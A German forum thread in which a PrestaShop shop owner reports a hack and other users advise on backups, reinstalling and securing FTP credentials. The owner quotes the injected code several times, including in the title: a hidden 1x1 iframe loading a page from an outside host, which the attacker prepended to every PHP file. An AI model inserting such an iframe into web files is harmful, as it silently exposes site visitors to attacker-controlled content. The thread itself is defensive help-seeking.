Shop gehackt, was nun? <iframe src=http://www.annabcreations.com/stata1.html WIDTH=1 HEIGHT=1 frameb

[freak82]

nabend kameraden,

 

mein shop wurde wohl gehackt, konnte mich im admin-menü nicht einloggen (seite blieb weiß), habe dann beim joster angerufen, er schaute in die installation rein und meinte sie ist wohl gehackt worden (zugangsdaten wurden über filezilla ausgespät -> ihm nach ein bekanntes problem!?).

 

habe also folgende Anleitung abgearbeitet

http://www.prestashop.com/forums/topic/126371-sicherheitslucke-entdeckt-in-allen-presta-14x-bis-1440-versionen/

 

in jeder php datei steht in meiner installation nun folgendes:

<iframe src=http://www.annabcreations.com/stata1.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><?php

 

habe versucht die zeile einzeln aus jeder php datei zu löschen, ich glaube es ist jedoch manuell nicht zu schaffen, zudem sehe ich nun wenn ich in der adresszeile meinen shop eingebe den inhalt der php datei, genauo auch im admin login seite...

 

wie gehe ich die sache nun am besten an? alles neu installieren, kann ich etwas von den Daten retten?

[freak82]

wo speichert presta die backups nochmal hin?

[freak82]

also zu beginn jeder php steht

 

 

<?php

/*

* 2007-2011 PrestaShop

*

bei mir war aber das

<?php

durch

<iframe src=http://www.annabcreations.com/stata1.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><?php

ersetzt worden. ich bin hin und habe diese zeile gelöscht, leider jedoch auch das <?php dahinter, heißt es jetzt ich soll <?php wieder einfügen, in jede einzelne php und es sollte wieder laufen?

[guest*]

Wenn du Backups mit Prestatool gemacht hast, dann werden dort nur Backups der Datenbank erstellt, aber nicht des Shops. Diese Sicherungen werden im Ordner /admin/backups gesichert.

 

Leider kann ich nicht sagen inwieweit der Hacker in das System eingedrungen ist und Änderungen vorgenommen hat. Dein Provider kann das am Besten anhand der Log-Files auslesen. Eine Analyse aller Änderungen zum Zeitpunkt sind wichtig !

 

Es gibt 2 Möglichkeiten:

 

a) Du hast keine Sicherungen des FTP's vorgenommen. Frage deinen Provider, ob er evtl. Sicherungen gemacht hat. Hat er eine Sicherung von ein paar Tagen vorher, dann soll er diese mal raufspielen. Bei der Datenbankrücksicherung wird es schwer, wenn nur dein Backup von irgendwann mal vorhanden ist. Hat der Provider auch diese mitgesichert, dann ist es leicht. Einfach alles 1:1 zurückspielen.

 

b ) Er hat keine Sicherung vom FTP

 

1) Die Prestashopversion die drauf war nochmals komplett sauber ohne Code-Änderungen installieren. Hiermit verlierst du aber die Sicherheitsparitäten des Programms und der Datenbank. Es funktioniere keine Passwörter mehr. Hier im Forum gibt es einige Postings diesbezüglich... Um dein eigenes Passwort zurückzusetzen, da sende ich dir per PM ein Hack wie das geht.

 

2) Ja die Sicherheitslücke in Filezilla ist bekannt, aber auch dein PC ist nicht ausreichend gesichert, denn der Hacker hat sich zunächst in deinem PC eingehackt und dann auf den Server. Du solltest deinen PC besser absichern und auch die von Filezilla-Passwörter besser schützen.Hier findest du einen HACK, oder HIER. Auch Hier findest du eine Möglichkeit.

 

 

Interessant wäre auch zu wissen welche Prestashopversion du verwendest, denn wie in einem gepinnten Post zu lesen ist, gab es einmal eine Lücke. Ist es keiner dieser Versionen, dann wäre sehr nützlich zu wissen, welche extra Module du installiert hast, die nicht original Prestashop sind. Eines der Module ist unsicher und gehört weg. Ich wurde selbst auch schon mal gehackt, der konnte aber nicht viel anstellen und es war ein unsicheres Kaufmodul. Der Hack wurde aber direkt im Modul auf der Website. gemacht.

[freak82]

hatte die 1,4,4.4 drauf glaube ich, hab dem provider jetzt mal ne mail geschrieben, komme aber nicht drum herum alles nochmal neu machen

[guest*]

Gepinnte postings im Forum sollte man unbedingt lesen... http://www.prestasho...1440-versionen/

 

Version 1.4.4.4 gab es keine - 1.4.4.0, 1.4.4.1, 1.4.5.1, 1.4.6.1, 1.4.6.2, 1.4.7.0

 

Weiters hat Prestashop auch noch andere rechtzeitige Vorkehrungen getroffen und allen Shopinhabern mittels Sonder-Newsletter den Hack mitgeteilt und entsprechende Maßnahmen empfohlen.